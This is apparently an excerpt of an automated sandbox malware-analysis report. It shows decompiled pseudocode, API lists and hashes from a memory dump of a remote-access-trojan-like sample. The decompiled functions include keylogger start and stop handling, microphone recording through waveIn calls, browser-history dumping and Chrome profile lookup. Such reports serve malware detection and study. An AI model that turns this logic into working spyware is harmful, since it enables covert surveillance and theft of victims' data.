                								 *((char*)(_t166 + _t175 + 0x4739b0)) = 0x20;
                							}
                							_t178 =  &(_t177[3]);
                							_t37 = _t166 + 0x473990; // 0x473990
                							E004351E0(_t37 + _t175, _t178[8], 0x20);
                							_t179 =  &(_t178[3]);
                							 *(_t166 + _t175 + 0x4739e2) =  *(_t142 + 0x314) >> 0x00000009 & 0x00000001;
                							 *((intOrPtr*)(_t166 + _t175 + 0x47398c)) =  *((intOrPtr*)(_t142 + 0x20c));
                							 *((intOrPtr*)(_t166 + _t175 + 0x473988)) = E0041D039(0x474a44);
                							 *((char*)(_t166 + _t175 + 0x4739e4)) =  *((intOrPtr*)(_t142 + 0x317));
                							 *((char*)(_t166 + _t175 + 0x4739e5)) =  *((intOrPtr*)(_t142 + 0x318));
                							 *((short*)(_t166 + _t175 + 0x4739fc)) =  *((intOrPtr*)(_t142 + 0x1e4));
                							 *((intOrPtr*)(_t166 + 0x473984)) =  *((intOrPtr*)(_t166 + 0x473984)) + 1;
                							if( *(_t166 + 0x473980) == 3) {
                								 *(_t166 + 0x473980) =  *(_t166 + 0x473980) & 0x00000000;
                							}
                							if(( *(_t142 + 0x310) & 0x00000030) != 0x10) {
                								L25:
                								 *(_t166 + _t175 + 0x4739e6) = 0;
                								goto L24;
                							} else {
                								_t124 =  *(_t142 + 0x1ce) & 0x0000ffff;
                								if(_t124 == 0) {
                									goto L25;
                								}
                								 *(_t166 + _t175 + 0x4739e6) = _t124;
                								_t67 = _t166 + 0x4739e8; // 0x4739e8
                								E004351E0(_t67 + _t175, _t142 + 0x1d0,  *(_t142 + 0x1ce) & 0x0000ffff);
                								_t130 = E0042035E(_t142 + 0x1d0,  &(_t179[7]));
                								_t169 = _t179[8];
                								_t180 =  &(_t179[4]);
                								_t153 = 0xb;
                								_t162 = _t130 % _t153;
                								if(_t169 == 0) {
                									_t172 = _t162 * 0x14;
                									_t154 =  *(_t172 + 0x474950);
                									 *(_t172 + 0x474950) = _t154 + 1;
                									_t134 = _t162 * 5 + _t154;
                									 *((short*)(0x474958 + _t134 * 4)) = _t180[8];
                									 *((short*)(0x47495a + _t134 * 4)) = _t180[5];
                									 *((intOrPtr*)(_t172 + 0x474954)) =  *((intOrPtr*)(_t172 + 0x474954)) + 1;
                									if( *(_t172 + 0x474950) == 3) {
                										 *(_t172 + 0x474950) =  *(_t172 + 0x474950) & 0x00000000;
                									}
                									_t169 = _t180[4];
                								}
                								L24:
                								E00432AEB(0x474a44);
                								_t151 = 0xffffff96;
                								_t170 =  !=  ? _t151 : _t169;
                								_t93 =  !=  ? _t151 : _t169;
                								goto L27;
                							}
                						}
                						_t93 = 0xffffff96;
                						goto L27;
                					}
                					_t93 = _t169;
                					goto L27;
                				}
                				L1:
                				_t93 = 0;
                				goto L27;
                			}





























                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: DJG$DJG
                • API String ID: 0-3553971598
                • Opcode ID: e8c7b146054ac432a77ccc8b031f1909a635b70973a3760844eb4ba0b5c61c59
                • Instruction ID: f2201e53aae1a578f399186880d4f81f94f4690d310475270f371cf99ab1fffa
                • Opcode Fuzzy Hash: e8c7b146054ac432a77ccc8b031f1909a635b70973a3760844eb4ba0b5c61c59
                • Instruction Fuzzy Hash: 8861F0F16046569BC704DF28D8017A6F7E4FF84304F04052EED9C8B346E778AA64DBAA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E0040402C(void* __ebx) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v100;
                				char _v124;
                				char _v148;
                				char _v172;
                				short _v692;
                				void* __edi;
                				void* __ebp;
                				struct HINSTANCE__* _t81;
                				struct HINSTANCE__* _t84;
                				void* _t85;
                				void* _t86;
                
                				_t48 = __ebx;
                				_t81 = 0;
                				GetModuleFileNameW(0,  &_v692, 0x104);
                				E004020BF(__ebx,  &_v52);
                				E0040CEEC( &_v28, 0x30, E00401F8B(E0041A4D3( &_v76)));
                				E00401FB8();
                				E00401F8B(0x472e18);
                				E00417456(E00401EE4(E00402FF4(_t48,  &_v100, E004042FD(_t48,  &_v124, E004042DC(_t48,  &_v148,  &_v692, _t85, 0, E0040415E(__ebx,  &_v172, 0x30, _t85, L" /sort \"Visit Time\" /stext \"")), _t85, 0,  &_v28), 0, _t85, 0, "\"")));
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				_t84 = 0;
                				while(1) {
                					E00401EE4( &_v28);
                					_t80 =  &_v52;
                					if(E0041ADFE( &_v52) != 0) {
                						break;
                					}
                					Sleep(0xfa);
                					_t84 =  &(_t84->i);
                					if(_t84 < 0x14) {
                						continue;
                					} else {
                					}
                					L5:
                					E00401EE9();
                					E00401FB8();
                					return _t81;
                				}
                				E004020D6(_t48, _t86 - 0x18,  &_v52, __eflags,  &_v52);
                				_push(0x9d);
                				E00404A81(0x472d98, _t80, __eflags);
                				_t81 = 1;
                				__eflags = 1;
                				goto L5;
                			}


















                APIs
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                  • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                  • Part of subcall function 00417456: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00463E44), ref: 0041746C
                  • Part of subcall function 00417456: CloseHandle.KERNEL32(D>F,?,?,004040D5,00463E44), ref: 00417475
                  • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                • Sleep.KERNEL32(000000FA,00463E44), ref: 00404118
                Strings
                • /sort "Visit Time" /stext ", xrefs: 00404092
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                • String ID: /sort "Visit Time" /stext "
                • API String ID: 368326130-1573945896
                • Opcode ID: 4f1a34a24bae5ba4efafafe93aad2e7791b4a511ca70f5422c5f56995e8fd322
                • Instruction ID: 0b16387c6f9edcb84504e01d0cc383686463f04b1c5a299ba0a956b40ef645a0
                • Opcode Fuzzy Hash: 4f1a34a24bae5ba4efafafe93aad2e7791b4a511ca70f5422c5f56995e8fd322
                • Instruction Fuzzy Hash: B7318431A0021957CB14FBA6DC969EE7779AF90308F40017FF506B71D2EF38598ACA99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E004503B7(void* __ecx, signed int _a4, intOrPtr _a8) {
                				int _v8;
                				void* __esi;
                				int _t15;
                				int _t16;
                				signed int _t17;
                				signed int _t23;
                				signed int _t25;
                				signed int _t26;
                				signed int _t27;
                				void* _t30;
                				void* _t31;
                				intOrPtr _t32;
                				intOrPtr _t33;
                				intOrPtr* _t34;
                				intOrPtr* _t36;
                
                				_push(__ecx);
                				_t23 = _a4;
                				_push(_t34);
                				if(_t23 == 0) {
                					L21:
                					_t15 = E0044716D(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                					__eflags = _t15;
                					if(_t15 != 0) {
                						_t16 = _v8;
                						__eflags = _t16;
                						if(_t16 == 0) {
                							_t16 = GetACP();
                						}
                						L25:
                						return _t16;
                					}
                					L22:
                					_t16 = 0;
                					goto L25;
                				}
                				_t17 = 0;
                				if( *_t23 == 0) {
                					goto L21;
                				}
                				_t34 = 0x45e318;
                				_t25 = _t23;
                				while(1) {
                					_t30 =  *_t25;
                					if(_t30 !=  *_t34) {
                						break;
                					}
                					if(_t30 == 0) {
                						L7:
                						_t26 = _t17;
                						L9:
                						if(_t26 == 0) {
                							goto L21;
                						}
                						_t36 = 0x45e320;
                						_t27 = _t23;
                						while(1) {
                							_t31 =  *_t27;
                							if(_t31 !=  *_t36) {
                								break;
                							}
                							if(_t31 == 0) {
                								L17:
                								_t48 = _t17;
                								if(_t17 != 0) {
                									_t16 = E0043A382(_t23, _t23);
                									goto L25;
                								}
                								if(E0044716D(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                									goto L22;
                								}
                								_t16 = _v8;
                								goto L25;
                							}
                							_t32 =  *((intOrPtr*)(_t27 + 2));
                							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
                								break;
                							}
                							_t27 = _t27 + 4;
                							_t36 = _t36 + 4;
                							if(_t32 != 0) {
                								continue;
                							}
                							goto L17;
                						}
                						asm("sbb eax, eax");
                						_t17 = _t17 | 0x00000001;
                						__eflags = _t17;
                						goto L17;
                					}
                					_t33 =  *((intOrPtr*)(_t25 + 2));
                					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
                						break;
                					}
                					_t25 = _t25 + 4;
                					_t34 = _t34 + 4;
                					if(_t33 != 0) {
                						continue;
                					}
                					goto L7;
                				}
                				asm("sbb edx, edx");
                				_t26 = _t25 | 0x00000001;
                				__eflags = _t26;
                				goto L9;
                			}



















                APIs
                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450612,?,00000050,?,?,?,?,?), ref: 00450492
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: ACP$OCP
                • API String ID: 0-711371036
                • Opcode ID: f1c7551b471a892f553800437845e87fa4d211da0bcbbc8f051b82ee5a92802c
                • Instruction ID: b93994b24156d93d71cef3ddff737944661d95d4cf4e28bf2754044b1fc000f2
                • Opcode Fuzzy Hash: f1c7551b471a892f553800437845e87fa4d211da0bcbbc8f051b82ee5a92802c
                • Instruction Fuzzy Hash: 0521066AA00100A6DB34CA54C901B9B7356DF52B57F56842AEF0AD7303F73ADD4AC358
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00404FD4(intOrPtr _a4) {
                				char _v24;
                				void* _v28;
                				struct _SYSTEMTIME _v40;
                				void* __ebx;
                				void* __ebp;
                				void* _t11;
                				void* _t17;
                				void* _t35;
                				intOrPtr _t36;
                				void* _t38;
                				void* _t42;
                				void* _t43;
                
                				if( *0x473544 == 0) {
                					__eflags = 0;
                					return 0;
                				}
                				_t36 = _a4;
                				if( *0x470d48 == 0) {
                					L7:
                					 *0x473560 =  *0x473560 & 0x00000000;
                					 *0x473565 = 1;
                					 *0x47355c = _t36;
                					return 1;
                				}
                				_t46 =  *0x473564;
                				_t22 = "KeepAlive             | Enabled | Timeout: ";
                				_t37 = "i";
                				if( *0x473564 != 0) {
                					GetLocalTime( &_v40);
                					_t17 = E0041A6E9("KeepAlive             | Enabled | Timeout: ",  &_v24, _t36);
                					_t42 = _t38 - 0x18;
                					E004052DD(_t22, _t42, _t22, "i", _t46, _t17);
                					_t43 = _t42 - 0x14;
                					E00402073(_t22, _t43, _t22, "i", _t37);
                					E0041A04A(_t22, _t35);
                					_t38 = _t43 + 0x30;
                					E00401FB8();
                					 *0x473564 = 0;
                				}
                				if( *0x47355c != _t36) {
                					_t48 =  *0x473565;
                					if( *0x473565 != 0) {
                						GetLocalTime( &_v40);
                						_t11 = E0041A6E9(_t22,  &_v24, _t36);
                						_t39 = _t38 - 0x18;
                						E004052DD(_t22, _t38 - 0x18, _t22, _t37, _t48, _t11);
                						E00402073(_t22, _t39 - 0x14, _t22, _t37, _t37);
                						E0041A04A(_t22, _t35);
                						E00401FB8();
                					}
                				}
                				goto L7;
                			}
















                APIs
                • GetLocalTime.KERNEL32(?,004734E8,?,00000000,?,?,?,?,?,?,00415007,?,00000001,0000004C,00000000), ref: 00405010
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • GetLocalTime.KERNEL32(?,004734E8,?,00000000,?,?,?,?,?,?,00415007,?,00000001,0000004C,00000000), ref: 00405067
                Strings
                • KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LocalTime
                • String ID: KeepAlive | Enabled | Timeout:
                • API String ID: 481472006-1507639952
                • Opcode ID: f6f4986efb37b8d342486ec4eef68092672092b0f0007e9071cdaf16fe546712
                • Instruction ID: 9a4cfd33936eaa6b36ea74c7cc729b7cf4cbb54b4ad27954b172034734b4d9a3
                • Opcode Fuzzy Hash: f6f4986efb37b8d342486ec4eef68092672092b0f0007e9071cdaf16fe546712
                • Instruction Fuzzy Hash: AC2129719043806BD714FB25DC4575F7B54AB45309F04057EF485532A2DA3D5688CBEB
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E0041A04A(void* __ebx, void* __edi, char _a4, char _a28) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v100;
                				signed short _v102;
                				signed short _v104;
                				signed short _v106;
                				signed short _v108;
                				void* __ebp;
                				void* _t57;
                				signed int _t58;
                				struct _SYSTEMTIME* _t60;
                
                				_t60 = (_t58 & 0xfffffff8) - 0x70;
                				_t62 =  *0x470d48;
                				if( *0x470d48 != 0) {
                					GetLocalTime(_t60);
                					_push(_v102 & 0x0000ffff);
                					_push(_v104 & 0x0000ffff);
                					_push(_v106 & 0x0000ffff);
                					E00406874(_t62, E00401F8B(E00408832(__ebx,  &_v100, E00402EF0(__ebx,  &_v76, E00408832(__ebx,  &_v52, E004052FE( &_v28, "%02i:%02i:%02i:%03i ", _t57,  &_a4), __edi, _t57, _t62, " | "), _t57, _t62,  &_a28), __edi, _t57, _t62, "\n")), _v108 & 0x0000ffff);
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                				}
                				E00401FB8();
                				return E00401FB8();
                			}
















                APIs
                • GetLocalTime.KERNEL32(00000000), ref: 0041A064
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LocalTime
                • String ID: | $%02i:%02i:%02i:%03i
                • API String ID: 481472006-2430845779
                • Opcode ID: 73f1784e6b0f8c6c2b56327e02b954a3cae6b777a92ff4e659f5f7ca666b0f94
                • Instruction ID: 305aa241e5e1249f2c56a36f0bedab380cdf1516fdeeb0388db8af3b2f80b87a
                • Opcode Fuzzy Hash: 73f1784e6b0f8c6c2b56327e02b954a3cae6b777a92ff4e659f5f7ca666b0f94
                • Instruction Fuzzy Hash: DD11637250820156C704FBA5D841CAFB3E8AF84348F504A3FF485A21E1EF3CD945CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E004016EF(signed int __ecx, unsigned int __edx, void* __edi, void* __esi, void* __ebp, char _a8) {
                				signed int _v0;
                				char _v20;
                				void* __ebx;
                				signed int _t19;
                				signed int _t20;
                				void* _t21;
                				signed int _t29;
                				unsigned int _t30;
                				long _t37;
                				signed int _t40;
                
                				E00401FA0(0x472d74,  &_a8);
                				_t29 = _v0;
                				0x470aa8->wFormatTag = 1;
                				_t19 = (__edx & 0x0000ffff) >> 3;
                				asm("movd xmm0, edx");
                				asm("cvtdq2pd xmm0, xmm0");
                				 *0x470aac = _t29;
                				 *0x470ab6 = __edx;
                				_t30 = _t29 >> 0x1f;
                				 *0x470aaa = __ecx;
                				asm("addsd xmm0, [edx*8+0x46b1e0]");
                				 *0x470ab0 = (__ecx & 0x0000ffff) * _t19 * _t29;
                				_t37 = 0;
                				 *0x470ab8 = 0;
                				asm("cvtpd2ps xmm0, xmm0");
                				 *0x470ab4 = (__edx >> 0x00000003 & 0x0000ffff) * (__ecx & 0x0000ffff);
                				asm("mulss xmm0, [0x46b18c]");
                				asm("cvttss2si eax, xmm0");
                				_t20 = _t19 * 0;
                				_t40 = _t20;
                				 *0x470abc = 0;
                				 *0x470a80 = _t20;
                				waveInOpen(0x470ac8, 0xffffffff, 0x470aa8, 0x40184a, 0, 0x30008);
                				do {
                					E004017CC(_t37, _t30, _t40);
                					_t37 = _t37 + 1;
                				} while (_t37 < 2);
                				waveInStart( *0x470ac8);
                				_pop(_t21);
                				return E004023AE(_t21,  &_v20, __ebp, 1, 0);
                			}














                APIs
                • waveInOpen.WINMM(00470AC8,000000FF,00470AA8,0040184A,00000000,00030008,?), ref: 004017A1
                  • Part of subcall function 004017CC: waveInPrepareHeader.WINMM(?,00000020,00000000,00000000,?,00000000,?,?,004017AE), ref: 00401829
                  • Part of subcall function 004017CC: waveInAddBuffer.WINMM(?,00000020,?,00000000,?,?,004017AE), ref: 0040183F
                • waveInStart.WINMM ref: 004017BA
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: wave$BufferHeaderOpenPrepareStart
                • String ID: t-G
                • API String ID: 4183526013-1680578370
                • Opcode ID: 3d24f6267b8bac03b3880ecd6faf7845489f839e1f41d23f6f3b62a1441da131
                • Instruction ID: 95a711b6e76d91f395065626d5ac92766c974447fb9b8fe42a04c668eb71b703
                • Opcode Fuzzy Hash: 3d24f6267b8bac03b3880ecd6faf7845489f839e1f41d23f6f3b62a1441da131
                • Instruction Fuzzy Hash: 1E110071A15310DEC359DB35AC40956B6E8EFAA365B10823BE04AE72F0E7384480C75C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E0040B6DC(signed int __edx) {
                				char _v8;
                				void* __ecx;
                				void* _t6;
                				char _t15;
                
                				_push(_t15);
                				 *0x470b19 = _t15;
                				 *0x470b28 = __edx * 0xea60;
                				if(_t15 == 0) {
                					L4:
                					CreateThread(0, 0, E0040B586, 0, 0, 0);
                					_t6 = 1;
                				} else {
                					_t26 = "FR";
                					_v8 = 0;
                					if(E004127E7(0x473238, E00401F8B(0x473238), "FR") == 0) {
                						goto L4;
                					} else {
                						E00412831(E00401F8B(0x473238), _t26,  &_v8);
                						if(_v8 == 0) {
                							goto L4;
                						} else {
                							_t6 = 0;
                						}
                					}
                				}
                				return _t6;
                			}








                APIs
                • CreateThread.KERNEL32 ref: 0040B743
                  • Part of subcall function 004127E7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B716,00464C08), ref: 004127FE
                  • Part of subcall function 004127E7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B716,00464C08), ref: 00412812
                  • Part of subcall function 004127E7: RegCloseKey.KERNELBASE(?,?,?,0040B716,00464C08), ref: 0041281D
                  • Part of subcall function 00412831: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                  • Part of subcall function 00412831: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                  • Part of subcall function 00412831: RegCloseKey.KERNELBASE(?), ref: 0041287A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue$CreateThread
                • String ID: 82G$Cqt
                • API String ID: 3520877709-164559435
                • Opcode ID: 3997dbd3b2fee93201a8807a607ca5a04ba4ba77cef879933a9cd44b6ecea690
                • Instruction ID: aa30cb8e898e471b953b87efe3deb9bdc24ff20182dd0f4763c4c7706c19c14b
                • Opcode Fuzzy Hash: 3997dbd3b2fee93201a8807a607ca5a04ba4ba77cef879933a9cd44b6ecea690
                • Instruction Fuzzy Hash: 8CF0F93070221477C7105B666C858EBBB9DCE83B65310407FF805A7381DB799E4642FD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E00419872(void* __ebx) {
                				char _v28;
                				void* __ebp;
                				void* _t28;
                				void* _t29;
                				void* _t36;
                				signed int _t37;
                				void* _t39;
                
                				_t39 = (_t37 & 0xfffffff8) - 0x1c;
                				E0040CEEC( &_v28, 0x30, "alarm.wav");
                				if(PathFileExistsW(E00401EE4( &_v28)) != 0) {
                					L7:
                					E0041991B(E00401EE4( &_v28));
                				} else {
                					if(E00405AE5(0x464074) == 0) {
                						E0041AE6B(0x4738b8, E00401EE4( &_v28));
                						goto L7;
                					} else {
                						_t43 =  *0x472aca;
                						_t28 = _t39 - 0x18;
                						_push(0x46a8dc);
                						if( *0x472aca == 0) {
                							E00402073(__ebx, _t28, 0x464074, _t36);
                							_t29 = 0x4734e8;
                						} else {
                							E00402073(__ebx, _t28, 0x464074, _t36);
                							_t29 = 0x4738d0;
                						}
                						_push(0xa1);
                						E00404A81(_t29, 0x464074, _t43);
                					}
                				}
                				return E00401EE9();
                			}











                APIs
                • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415F1F,00000000), ref: 00419897
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: alarm.wav$4G
                • API String ID: 1174141254-2977537865
                • Opcode ID: d272e0991f2b056bc812bbc590206f8d3f4e67015d279ed5f53dfe57b56d3e37
                • Instruction ID: 34e28ac8ce078d76f0f9f0665c2abcaeee574b9cd4657200da68d7dd76b5aff6
                • Opcode Fuzzy Hash: d272e0991f2b056bc812bbc590206f8d3f4e67015d279ed5f53dfe57b56d3e37
                • Instruction Fuzzy Hash: 2001C020B1420056CA14FA76D8666EE26859B81358F00417FF819662E2EF7D4D85D2DF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E0040A5C4(void* __ebx, struct HHOOK__** __ecx, void* __edx) {
                				char _v28;
                				void* __edi;
                				void* __ebp;
                				struct HHOOK__** _t30;
                				void* _t31;
                				void* _t32;
                
                				_t30 = __ecx;
                				_t37 =  *((char*)(__ecx + 0x4a));
                				if( *((char*)(__ecx + 0x4a)) == 0) {
                					__eflags = 0;
                					return 0;
                				}
                				E00402073(__ebx,  &_v28, __edx, _t31, "Online Keylogger Stopped");
                				E0041A7B9(_t32 - 0x18,  &_v28);
                				E0040A6DA(__ebx, _t30, _t37);
                				E00401FB8();
                				E00402073(__ebx, _t32,  &_v28, _t31, "Online Keylogger Stopped");
                				E00402073(__ebx, _t32 - 0xffffffffffffffe8,  &_v28, _t31, "i");
                				E0041A04A(__ebx, "Online Keylogger Stopped");
                				_t30[0x12] = 0;
                				CloseHandle(_t30[0xf]);
                				if(_t30[0x12] == 0 &&  *_t30 != 0) {
                					UnhookWindowsHookEx( *_t30);
                					 *_t30 =  *_t30 & 0x00000000;
                				}
                				return 1;
                			}










                APIs
                  • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                  • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • CloseHandle.KERNEL32(?), ref: 0040A627
                • UnhookWindowsHookEx.USER32 ref: 0040A63A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                • String ID: Online Keylogger Stopped
                • API String ID: 1623830855-1496645233
                • Opcode ID: e4fbb39f625da648bd772e9ec3b8865b03d7b6b24e3156352346ea33974c60de
                • Instruction ID: 152bd68872477db56328b5f984a61734b927b4b139483ca97bc76b34e3d0b4bf
                • Opcode Fuzzy Hash: e4fbb39f625da648bd772e9ec3b8865b03d7b6b24e3156352346ea33974c60de
                • Instruction Fuzzy Hash: 7301F531A043005BD7217B65D80BBBE7B755B41305F44046FE581222D2EBBA19A6D7DF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004017CC(signed int __ecx, void* __edx, void* __eflags) {
                				void* __ebp;
                				long _t10;
                				signed int _t17;
                				struct wavehdr_tag* _t25;
                
                				_t28 = __eflags;
                				E00401E45(0x472d34, __edx, 0x472d34, __eflags, __ecx);
                				E00401F7D( *0x470a80);
                				_t17 = __ecx << 5;
                				_t25 =  *0x472d70 + _t17;
                				_t25->lpData = E00401F8B(E00401E45(0x472d34, __edx, 0x472d34, _t28, __ecx));
                				_t10 =  *0x470a80; // 0x0
                				_t25->dwBufferLength = _t10;
                				_t25->dwBytesRecorded = 0;
                				_t25->dwUser = 0;
                				_t25->dwFlags = 0;
                				_t25->dwLoops = 0;
                				waveInPrepareHeader( *0x470ac8, _t25, 0x20);
                				return waveInAddBuffer( *0x470ac8,  *0x472d70 + _t17, 0x20);
                			}








                APIs
                • waveInPrepareHeader.WINMM(?,00000020,00000000,00000000,?,00000000,?,?,004017AE), ref: 00401829
                • waveInAddBuffer.WINMM(?,00000020,?,00000000,?,?,004017AE), ref: 0040183F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: wave$BufferHeaderPrepare
                • String ID: 4-G
                • API String ID: 2315374483-347150978
                • Opcode ID: 3e08850692b404ea83f60d83b64b85df34babf4643777886e7b387fe8397b049
                • Instruction ID: 6b7ed70fd603f0a3b73b27032148b84c73c10b4b752733d916ddca8c7a8238c5
                • Opcode Fuzzy Hash: 3e08850692b404ea83f60d83b64b85df34babf4643777886e7b387fe8397b049
                • Instruction Fuzzy Hash: B201AD71302300AFC7509F35EC4492ABBA9FB89305B01413AF809C37A2EB7998508B98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 29%
                			E00447366(void* __ecx, void* __esi, void* __eflags, char _a4) {
                				signed int _v8;
                				signed int _t5;
                				intOrPtr* _t18;
                				signed int _t20;
                
                				_t13 = __ecx;
                				_push(__ecx);
                				_t5 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t5 ^ _t20;
                				_push(__esi);
                				_t18 = E00446D4A(0x15, "IsValidLocaleName", 0x45d1a8, "IsValidLocaleName");
                				if(_t18 == 0) {
                					_t3 =  &_a4; // 0x4433eb
                					IsValidLocale(E004474BB(_t13, _t18, __eflags,  *_t3, 0), 1);
                				} else {
                					_t2 =  &_a4; // 0x4433eb
                					 *0x4574c8( *_t2);
                					 *_t18();
                				}
                				return E004338BB(_v8 ^ _t20);
                			}








                APIs
                • IsValidLocale.KERNEL32(00000000,3D,00000000,00000001,?,?,004433EB,?,?,00442DCB,?,00000004), ref: 004473B2
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LocaleValid
                • String ID: IsValidLocaleName$3D
                • API String ID: 1901932003-2077415542
                • Opcode ID: dbdf72e8e2661f57c780aa44d4f8bbb8f5dee09d7a0af35499866a64bb157ce1
                • Instruction ID: 1aafa65fd00d6e25da83e5a77131e27d47e67d355686313c1ce54cf128189aa6
                • Opcode Fuzzy Hash: dbdf72e8e2661f57c780aa44d4f8bbb8f5dee09d7a0af35499866a64bb157ce1
                • Instruction Fuzzy Hash: 25F0B430A84608B7E7106B219C06FAD7B54CF05712F10416AFD056A282DA795E0295ED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040BA3D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                				char _v28;
                				void* __ebp;
                				int _t10;
                				void* _t22;
                				void* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t25 = __edi;
                				_t24 = __edx;
                				_t16 = __ebx;
                				_t26 = __ecx;
                				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"UserProfile"));
                				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Google\\Chrome\\");
                				_t10 = PathFileExistsW(E00401EE4( &_v28));
                				_t22 = _t26;
                				_t29 = _t10;
                				if(_t10 == 0) {
                					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
                				} else {
                					E00403242(_t16, _t22, _t27, _t29,  &_v28);
                				}
                				E00401EE9();
                				return _t26;
                			}











                APIs
